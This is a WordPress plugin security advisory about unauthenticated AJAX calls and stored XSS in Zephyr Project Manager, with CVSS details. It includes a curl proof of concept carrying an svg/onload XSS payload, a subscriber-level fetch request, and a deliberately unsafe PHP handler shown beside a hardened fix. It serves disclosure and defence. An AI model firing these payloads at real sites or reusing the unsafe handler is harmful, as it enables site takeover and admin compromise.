wpexploit | Rizacan Tufan | WPEX-ID:82E01F95-81C2-46D8-898E-07B3B8A3F8C9
History: Sep 08, 2022 - 12:00 a.m.

Zephyr Project Manager < 3.2.55 - Unauthorised AJAX Calls To Stored XSS

2022-09-08 00:00:00
Rizacan Tufan
71

5.4 Medium (CVSS3)

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

EPSS: 0.001 Low (Percentile 21.0%)

The plugin does not perform any authorisation or CSRF checks in any of its AJAX actions, allowing unauthenticated users to call them either directly or via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping, it could also allow them to perform Stored Cross-Site Scripting attacks against logged-in admins. The issue was partially fixed in 3.2.5.

All AJAX actions are affected. Below is an example of an unauthenticated Stored XSS by updating a Status:

curl -i -s -k -X $'POST' --data-binary $'name="><svg/onload=alert(/XSS/)>&color=%23eeeeee&slug=not_started&type=status&action=zpm_update_status' \
    $'https://example.com/wp-admin/admin-ajax.php'

The XSS will be triggered when an admin views the Statuses page (/wp-admin/admin.php?page=zephyr_project_manager_categories).


v3.2.5 fixed the CSRF and XSS; however, proper authorisation was still missing. For example, log in as a subscriber and run the command below in the browser's developer console:

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'name=SetBySubscriber&color=%23eeeeee&slug=not_started&type=status&action=zpm_update_status&zpm_nonce=' + zpm_localized['zpm_nonce'],
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
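The three defects the advisory describes (no authorisation, no CSRF check, no sanitisation or escaping) map onto three separate controls in a WordPress AJAX handler, and the v3.2.5 partial fix shows why a nonce alone is not authorisation. The following is an added illustration, not code from the Zephyr Project Manager plugin: the handler name `example_update_status`, the option name `example_statuses`, the nonce action name and the `manage_options` capability are assumptions chosen for the example; the `zpm_nonce` field and `zpm_localized` object names are taken from the PoC above. The script handle `example-admin` is assumed to be registered elsewhere.

```php
<?php
/**
 * Added example (not the plugin's own code): a WordPress AJAX "update status"
 * handler in the unsafe shape the advisory describes, then hardened.
 * Handler name, option name, nonce action and capability are assumptions.
 */

// --- Vulnerable shape: no capability check, no nonce check, no sanitisation ---
// Registering under wp_ajax_nopriv_* makes the action callable without login.
add_action( 'wp_ajax_nopriv_example_update_status', 'example_update_status_unsafe' );
add_action( 'wp_ajax_example_update_status', 'example_update_status_unsafe' );
function example_update_status_unsafe() {
    $statuses   = get_option( 'example_statuses', array() );
    $statuses[] = array(
        'name'  => $_POST['name'],   // stored verbatim: markup in "name" lands in the DB unchanged
        'color' => $_POST['color'],
        'slug'  => $_POST['slug'],
    );
    update_option( 'example_statuses', $statuses );
    wp_send_json_success();
}

// --- Hardened shape ---
// 1. Only logged-in users reach wp_ajax_* (no nopriv hook is registered).
add_action( 'wp_ajax_example_update_status', 'example_update_status_safe' );
function example_update_status_safe() {
    // 2. CSRF: verify the nonce posted in the zpm_nonce field; dies on failure.
    check_ajax_referer( 'example_update_status', 'zpm_nonce' );

    // 3. Authorisation: a valid nonce proves the request came from our page, not
    //    that the user may edit statuses. A subscriber has the nonce (it is
    //    localized into the page) but not this capability, which is exactly the
    //    gap left after the v3.2.5 partial fix.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 4. Sanitise on input: sanitize_text_field strips tags, sanitize_key
    //    reduces the slug to [a-z0-9_-], and the colour must be a 6-digit hex value.
    $name  = sanitize_text_field( wp_unslash( $_POST['name'] ?? '' ) );
    $slug  = sanitize_key( $_POST['slug'] ?? '' );
    $color = wp_unslash( $_POST['color'] ?? '' );
    if ( ! preg_match( '/^#[0-9a-fA-F]{6}$/', $color ) ) {
        wp_send_json_error( array( 'message' => 'invalid color' ), 400 );
    }
    if ( '' === $name || '' === $slug ) {
        wp_send_json_error( array( 'message' => 'missing fields' ), 400 );
    }

    $statuses   = get_option( 'example_statuses', array() );
    $statuses[] = compact( 'name', 'slug', 'color' );
    update_option( 'example_statuses', $statuses );
    wp_send_json_success( compact( 'name', 'slug', 'color' ) );
}

// 5. Escape on output: stored data is escaped where it is rendered, so an admin
//    viewing the Statuses page never executes anything that reached the option.
function example_render_statuses() {
    foreach ( get_option( 'example_statuses', array() ) as $status ) {
        printf(
            '<li style="color:%s">%s (%s)</li>',
            esc_attr( $status['color'] ),
            esc_html( $status['name'] ),
            esc_html( $status['slug'] )
        );
    }
}

// The nonce is handed to the admin script the way the PoC reads it (a localized
// object). It is origin proof only, hence the capability check in step 3.
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'example-admin', 'zpm_localized', array(
        'zpm_nonce' => wp_create_nonce( 'example_update_status' ),
    ) );
} );
```

With the hardened handler, the advisory's first PoC fails at the login requirement, the second (subscriber with a valid nonce) fails at the capability check, and the Statuses page escapes whatever is stored; each control covers a case the others do not.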
